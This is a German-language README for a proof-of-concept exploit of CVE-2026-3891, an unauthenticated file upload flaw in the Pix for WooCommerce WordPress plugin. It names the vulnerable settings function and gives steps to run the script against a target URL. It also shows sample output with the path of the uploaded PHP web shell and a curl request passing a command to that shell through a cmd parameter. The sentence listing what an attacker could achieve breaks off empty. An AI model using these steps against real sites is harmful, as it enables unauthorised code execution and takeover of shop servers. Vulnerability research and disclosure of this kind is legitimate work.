
PoC für CVE-2026-3891 — Nicht authentifizierter beliebiger Datei-Upload, der zu Remote Code Execution in Pix for WooCommerce <= 1.5.0 führt.
CVE-2026-3891 ist eine kritische Unauthenticated Arbitrary File Upload-Sicherheitslücke, die im Pix for WooCommerce WordPress-Plugin in den Versionen bis einschließlich 1.5.0 gefunden wurde.
Die Schwachstelle existiert in der Funktionalität lkn_pix_for_woocommerce_c6_save_settings aufgrund fehlender Authentifizierungskontrollen und unzureichender Dateitypvalidierung. Der Exploit automatisiert den Prozess des Erhaltens eines gültigen Nonce und demonstriert das uneingeschränkte Hochladen einer PHP-Datei in ein über das Web zugängliches Verzeichnis.
Durch Ausnutzen dieser Schwachstelle könnte ein nicht authentifizierter Angreifer in der Lage sein:
pip install requests
CVE-2026-3891.py auf Ihrem System.python CVE-2026-3891.py
Geben Sie die Ziel-WordPress-URL ein, wenn Sie dazu aufgefordert werden:
[?] Enter target URL: http://localhost/wordpress
Beispiel:
[*] Requesting nonce...
[+] Nonce obtained: **********
[*] Uploading woocommerce.php...
[+] File uploaded successfully!
[+] URL: http://target/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/woocommerce.php
curl http://target/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/woocommerce.php?cmd=ls
